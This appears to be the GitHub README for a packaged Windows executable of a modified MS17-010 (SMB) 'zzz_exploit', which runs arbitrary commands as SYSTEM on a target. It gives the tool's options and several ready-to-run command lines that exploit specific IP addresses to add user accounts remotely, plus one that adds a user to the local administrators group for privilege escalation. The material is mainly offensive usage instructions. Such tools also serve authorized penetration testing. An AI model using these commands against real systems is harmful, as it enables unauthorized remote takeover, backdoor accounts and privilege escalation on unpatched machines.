Skip to content

Latest commit

 

History

History
42 lines (38 loc) · 2.01 KB

README.md

File metadata and controls

42 lines (38 loc) · 2.01 KB

ms17-010

This is a modified version of the Worawit Wang: GitHub zzz_exploit for MS17-010.
It implements a few options such as username/password specification and an arbitrary command to be executed.
It does not change anything related to the SMB exploitation
This is a bundle with an executable and dependencies and DOES NOT require python install.
Built with Pyinstaller.

Usage

Unzip the bundle and from the command line execute ms17-010-zzz.exe

ms17-010-zzz.exe -h
usage: ms17-010-zzz.exe [-h] -t TARGET -c COMMAND -P PIPE [-u USER] [-p PASSWORD]

MS17-010 - zzz_explot modified and converted to binary https://github.com/irgoncalves/ms17-010

optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target for exploitation
-c COMMAND, --command COMMAND
Command to be executed as a service
-P PIPE, --pipe PIPE Pipe to connect (e.g. netlogon)
-u USER, --user USER Username to authenticate in case no anomymous
connection to a pipe is allowed
-p PASSWORD, --password PASSWORD
Password for the user

Example: ms17-010.exe -t 172.16.0.2 -c 'net user /add testusr teste123'

Example to add a user remotely connecting anonymously to a named pipe:
ms17-010-zzz.exe -t 10.128.1.208 -c "net user /add teste2 teste2123"

Example to add a user remotely specifying a named pipe and a valid non-administrator user:
ms17-010-zzz.exe -t 10.128.1.208 -c "net user /add teste2 teste2123" -P netlogon -u svruser -p abc123

Example to locally escalate privilege for an existent user (all commands are executed by SYSTEM):
ms17-010-zzz.exe -t 127.0.0.1 -c "net localgroup administrators teste2 /add" -P netlogon -u teste2 -p teste2123

Limitations

Currently supports only x64 platform (Tested running from Windows 10, 2K8)